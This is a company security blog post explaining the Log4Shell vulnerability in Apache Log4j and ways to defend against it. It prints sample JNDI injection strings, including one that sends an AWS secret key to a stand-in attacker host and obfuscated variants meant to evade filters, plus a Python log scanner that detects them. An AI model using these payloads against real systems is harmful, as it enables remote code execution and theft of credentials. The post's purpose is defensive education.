The Log4j Zero-Day Flaw: What It Is and 8 Ways to Protect Yourself

Editor’s Note: FISPAN is currently not vulnerable to Log4Shell (CVE-2021-44228) and has not identified any active exploitation at this time.

On December 9, 2021, a vulnerability was publicly demonstrated in the popular video game Minecraft: a user could send a crafted message in the game’s chat window and run arbitrary code on the server without authorization (Remote Code Execution, or RCE). The flaw turned out not to be in Minecraft itself but in Apache Log4j, the Java logging library used by the game’s server; it had been reported privately to the Apache project on November 24, 2021, before the public exploitation began. Assigned a CVSS score of 10 out of 10, the highest possible score for a vulnerability, it is officially tracked as CVE-2021-44228 and has been given the name Log4Shell.

What is Log4j?

Log4j is an Apache Java library for writing log messages from applications and one of the most widely used logging frameworks in the Java ecosystem: a very large share of Java applications either use it directly or pull it in through another dependency. It is relied on by software developers, who use it when debugging code, and by security professionals, who depend on application logs to keep track of what goes on in their environment.

This vulnerability is dangerous because the barrier to entry is very low. An exploit can be triggered by sending a chat message or typing the payload into a search field, since all the attacker needs is to get a controlled string into something the application logs, such as a username, an HTTP header or a query parameter. The exposed surface is also enormous: Java’s own installer claims the runtime is present on over 3 billion devices, and Log4j is embedded throughout that ecosystem. From Mars missions to in-home smart fridges, a great deal of software somehow and somewhere relies on code built around this library.

How Does the Log4Shell Exploit Work?

The root cause is that Log4j treated the data it was asked to log as something to interpret rather than as plain text. Versions 2.0-beta9 through 2.14.1 scanned every log message for ${...} lookup expressions and evaluated them, even when the message came from an untrusted source such as an HTTP header or a chat line. This is a failure to treat input as untrusted, the same class of problem the OWASP Top 10 files under injection. One of the supported lookups uses JNDI (the Java Naming and Directory Interface), a Java API that can fetch objects from local or remote naming services such as LDAP and RMI. If a string of the following form is logged, the server connects to the attacker’s LDAP server and, depending on the Java version, loads and runs a class it serves, hence "Remote Code Execution":

${jndi:ldap://attacker.example/a}

On older JVMs the LDAP response can point to a remote class file that is fetched and executed outright. Newer JVMs refuse to load remote classes through JNDI by default (the com.sun.jndi.ldap.object.trustURLCodebase setting), but the lookup and the outbound connection still happen, and attackers found variants that abuse classes already on the classpath or deserialization gadgets instead, so an up-to-date JVM reduces the risk without removing it. Because the lookups nest and can be combined, attackers also used the same mechanism to exfiltrate secrets (for example ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.example/a}) and to disguise the payload (for example ${${lower:j}ndi:...}) so that simple matching on the literal string ${jndi: does not catch it.
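The obfuscation point above matters for anyone writing detection rules. The following is an added example, not code from the original post: it mimics the small subset of Log4j 2.x lookup evaluation that attackers used to hide the word jndi (the lower and upper lookups and the ":-default" fallback syntax), collapses nested lookups until nothing changes, and only then checks for a JNDI lookup. The access-log lines are constructed (documentation IP ranges, invented timestamps), and the assumption that a lookup with a ":-default" resolves to its default is stated in the code; it reflects the attacker’s intent, since the probes deliberately reference variables that do not exist.

```python
"""Spot Log4Shell probes in web logs, including obfuscated ones.

Added example, not code from the original post. It mimics the subset of
Log4j 2.x lookup evaluation that attackers abused to hide the "jndi"
keyword (${lower:..}, ${upper:..} and the ":-" default-value syntax), then
checks whether a JNDI lookup is left over. The log lines are constructed.
"""
import re
from urllib.parse import unquote

# innermost ${...}: a lookup body containing no further '$', '{' or '}'
INNER = re.compile(r"\$\{([^${}]*)\}")
# the real target, checked after de-obfuscation; Log4j matches the lookup
# name case-insensitively, so "${JnDi:" counts as well
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# any other lookup that survived, e.g. ${env:AWS_SECRET_ACCESS_KEY}
LOOKUP = re.compile(r"\$\{[^{}]*:[^{}]*\}")


def _resolve(body, whole):
    """Return what Log4j would substitute for one innermost lookup.

    Only the obfuscation helpers are evaluated; the jndi lookup itself is
    left in place so it can be detected, and unknown lookups are kept.
    Assumption: a lookup with a ":-default" resolves to the default, since
    attackers deliberately reference variables that do not exist.
    """
    prefix, sep, rest = body.partition(":")
    if not sep or prefix.lower() == "jndi":
        return whole
    if ":-" in body:                      # ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":         # ${lower:J} -> j
        return rest.lower()
    if prefix.lower() == "upper":         # ${upper:j} -> J
        return rest.upper()
    return whole


def normalize(text, max_rounds=20):
    """Collapse innermost lookups, innermost first, until nothing changes.

    max_rounds bounds the work on hostile input; anything nested deeper
    than that is itself worth an alert.
    """
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def classify(raw_line):
    """'jndi' for an exploit attempt, 'lookup' for any other lookup that
    survived normalization (worth a look), None for a clean line."""
    text = normalize(unquote(raw_line))   # request lines are often URL-encoded
    if JNDI.search(text):
        return "jndi"
    if LOOKUP.search(text):
        return "lookup"
    return None


def scan(lines):
    """Return (line_index, verdict) for every line that is not clean."""
    return [(i, v) for i, line in enumerate(lines) if (v := classify(line))]


# Constructed access-log lines in combined format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:03:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:03:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:ldap}://198.51.100.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:03:13 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '198.51.100.20 - - [10/Dec/2021:14:03:14 +0000] "GET /search?q=${env:HOME}/index '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [10/Dec/2021:14:03:15 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_LOG):
        print(f"line {idx}: {verdict:6} {normalize(unquote(SAMPLE_LOG[idx]))}")
```

Run against the constructed lines, the first three are flagged as jndi (plain, nested-lookup and URL-encoded forms all collapse to the same ${jndi:ldap://...} string) and the fourth as a lookup worth reviewing; the plain browser request is not flagged. The same normalization is what a WAF or SIEM rule needs before matching, because a rule that looks only for the literal ${jndi: misses the second and third lines.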


How to Protect Against the Vulnerability

Log4Shell was a zero-day vulnerability: it was being exploited in the wild before a fix and advisory were widely available, so there was no lead time to patch servers and any exposed system could be compromised at any moment. The good news is that there are measures you can take to lower the odds of a successful attack on your company and to buy time to apply the proper fix:

  1. Stay Up-To-Date: This is an obvious rule, but you have to implement and follow patch management procedures rather than only installing updates when forced to. For Log4Shell the fix is to upgrade log4j-core to a patched release (2.17.1 or later; 2.12.4 for Java 7; 2.3.2 for Java 6), or, where that cannot be done immediately, to remove the JndiLookup class from the jar as an interim measure. Keeping the Java runtime itself current also helps: recent JVMs refuse to load remote classes through JNDI by default, which blocks the simplest exploit chain, though not every variant, so it reduces your exposure without replacing the library upgrade.

  2. Monitor 3rd Party Libraries: Even if your own code is not vulnerable, it depends on third-party libraries that are not under your control, and Log4j is often several levels deep in a dependency tree rather than something you chose directly. Keep an inventory of what you ship (a software bill of materials) and continuously monitor everything your code depends on, including transitive dependencies and the libraries bundled inside vendor-supplied applications.

  3. Utilize an Endpoint Detection and Response (EDR) Solution: In the first wave after a zero-day becomes public, it is used mostly by automated scripts that try to infect systems, deploy backdoors and establish persistent access; with Log4Shell the early payloads were largely cryptominers and botnet agents. A good behaviour-based EDR solution can block such attempts, for example a Java process suddenly spawning a shell or downloading and executing a binary, and buy time to patch the system.

  4. 24/7 monitoring with Security Information and Event Management (SIEM) solutions: Your systems should be monitored around the clock, with logs collected and processed by a dedicated SIEM. Make sure you collect all relevant telemetry, have real-time alerts and have response plans in place. With Log4Shell there are two good chances to detect an attempt: the inbound payload (a ${jndi: lookup, possibly obfuscated, in request headers or parameters) and the behaviour that follows (a Java process making an LDAP, RMI or DNS request to an unfamiliar host, or executing commands it never normally runs).

  5. Utilize a Web Application Firewall (WAF): A WAF will not reliably protect you from attacks on a service with a zero-day vulnerability, but it lets you deploy virtual-patch rules quickly while the real fix is rolled out. Expect attackers to work around simple rules: within days of disclosure, Log4Shell payloads were being obfuscated with nested lookups such as ${${lower:j}ndi:...} and ${${::-j}ndi:...} to slip past signatures that match only the literal ${jndi: string, so treat the WAF as one layer of defence, not the fix.

  6. Network Segmentation: Divide your network into isolated segments that work independently, so that one exploited service cannot be used to reach the rest of your network. For Log4Shell, egress filtering matters as much as internal segmentation: the exploit needs the vulnerable server to open an outbound LDAP, RMI or similar connection to the attacker, and a server that cannot initiate arbitrary outbound connections is far harder to exploit.

  7. Have a Recovery Plan: Unfortunate, but true: anyone can be compromised, so you should be able to rebuild your infrastructure even if everything is encrypted, destroyed, or compromised. Classic backups are good; infrastructure as code, which lets you recreate environments from version-controlled definitions, is better, and both should be tested regularly rather than trusted.

  8. Threat Hunting: Threat hunting is the practice of proactively searching for threats rather than waiting for alerts or for reports from your clients. Security teams should monitor as many sources as possible, including vendor advisories, CVE feeds and RSS feeds, and when a new issue like Log4Shell appears they should go back through historical logs for signs that it was exploited before detection rules existed.

This list is not exhaustive; many other recommendations are available.

FISPAN’s Steps to Reduce Vulnerabilities

With FISPAN’s constant monitoring for security threats, we were notified about the new Zero-Day vulnerability promptly, and FISPAN immediately took preventative measures:

  • FISPAN continuously scans all its source code and third-party libraries, so it was easy to identify any potentially vulnerable libraries.
  • The Security and Engineering team started to take appropriate actions to upgrade the library to the latest version and implemented appropriate prevention and monitoring measures to protect FISPAN products against this vulnerability.
  • Alongside the remediation process, FISPAN’s Security Team performed automated and manual tests on all potentially vulnerable services to detect any issues.

Based on our research, despite the use of a vulnerable library, FISPAN was not affected by any of the published exploits, as FISPAN’s library was used in conjunction with up-to-date Java.

What's Next?

As this situation evolves rapidly, we can expect the intensity of attacks to only increase. Your best courses of action are to keep up to date with changes, stay vigilant and, last but not least, follow security best practices.

Have Questions About Cyber Security?

Learn more about the state of commercial banking and security in this Security Boulevard article from FISPAN's own Head of Cyber Security, Maryam Hamidirad.

Our security team is also available to answer any questions you may have and can be reached at securityteam@fispan.com.
